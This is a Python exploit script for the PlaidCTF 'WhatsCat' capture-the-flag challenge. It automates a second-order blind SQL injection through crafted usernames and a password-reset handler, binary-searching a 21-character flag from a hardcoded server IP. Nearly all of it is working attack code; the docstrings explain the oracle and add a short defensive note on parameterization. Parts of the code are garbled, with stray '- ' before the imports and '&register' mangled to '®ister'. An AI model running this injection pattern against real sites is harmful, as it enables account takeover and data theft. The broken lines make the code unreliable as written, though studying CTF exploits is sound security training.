#PPP's WhatsCat Challenge Exploit by @ngocdh
#http://play.plaidctf.com/files/whatscat-59b6f6c9b192457fa3e7d2253c8b24c9.tar.bz2
#
#Step 1 : Register with username "hn"
#Step 2 : Register with username "hn' and 21=(select length(flag) from flag)#"
#Step 3 : Reset the password of the 2nd user
#Step 4 : Log in with username hn and the original password. If the password is now invalid, the condition was true (21 = length(flag))
#
#The flag table/column and length were found manually
#This code extracts only the flag
- import urllib2
- import string
- import random
def idgen(size=6, chars=string.ascii_uppercase + string.digits):
    """Return a random string of ``size`` characters drawn from ``chars``.

    Defaults to uppercase ASCII letters plus digits. ``random`` is not a
    CSPRNG, which is acceptable here: the value only has to be a fresh,
    unlikely-to-collide account name per probe, not a secret.
    """
    picks = [random.choice(chars) for _ in range(size)]
    return "".join(picks)
def check(pos, d, u):
    """Boolean oracle: is ascii(flag[pos]) within [d, u] (inclusive)?

    Drives the second-order SQL injection described in the file header. A
    fresh honest account is registered, then a second account whose name
    carries the probe condition; the password-reset handler interpolates
    that stored name into its query unescaped, so when the condition holds
    the reset lands on the honest account instead. A failed login with the
    honest account's original password therefore means "condition true".

    Args:
        pos: 1-based character position in the flag, already a str.
        d, u: lower and upper ASCII bounds for the probe, already strs.

    Returns:
        1 if the condition held (login no longer works), else 0.

    Defender's note: the root cause is a stored username reaching the
    reset query without parameterization; treating persisted user input
    as untrusted and binding it as a parameter closes this class of bug.
    """
    honest = idgen() + "hn"
    # Probe account name: closes the quote, appends the bounded-ASCII
    # condition, and comments out the remainder of the server's query.
    probe = "".join([
        honest,
        "'%20and%20(select%20ascii(substr(flag,", pos,
        ",1))from%20flag)%20between%20", d, "%20and%20", u, "#",
    ])
    endpoint = "http://54.196.116.77/index.php?page=login"
    # NOTE(review): "®ister" looks like "&register" mangled by HTML-entity
    # decoding of the paste ("&reg" -> "®"); reproduced as shown on the
    # page. Confirm against the original before relying on it.
    setup_bodies = [
        "name=" + honest + "&pass=hn&email=hn®ister=Register",
        "name=" + probe + "&pass=hn&email=hn®ister=Register",
        "name=" + probe + "&reset=Forgot+Password&pass=&email=",
    ]
    # Register honest, register probe, trigger reset on probe — in order.
    # Responses are read to completion but their content is not needed.
    for body in setup_bodies:
        urllib2.urlopen(endpoint, body).read()
    login_body = "name=" + honest + "&pass=hn&login=Login&email="
    page = urllib2.urlopen(endpoint, login_body).read()
    # Original password still accepted -> reset did not hit the honest
    # account -> the probe condition was false.
    still_valid = page.find("Welcome back") > 0 and page.find("invalid") < 0
    return 0 if still_valid else 1
# Recover the 21-character flag one byte at a time. Each byte is located by
# a binary search over the ASCII range 0..255 using check() as the oracle;
# 8 halvings are enough to pin a single value in that range. The flag
# length (21) was established manually, per the file header.
res = ""
for i in range(1, 22):
    lo, hi = 0, 255
    for _ in range(0, 8):
        mid = (lo + hi) // 2
        # hit == 1: byte is within [lo, mid]; hit == 0: it is above mid.
        hit = check(str(i), str(lo), str(mid))
        if hit == 1:
            hi = mid
        elif hit == 0:
            lo = mid + 1
    res = res + chr(lo)
print(res)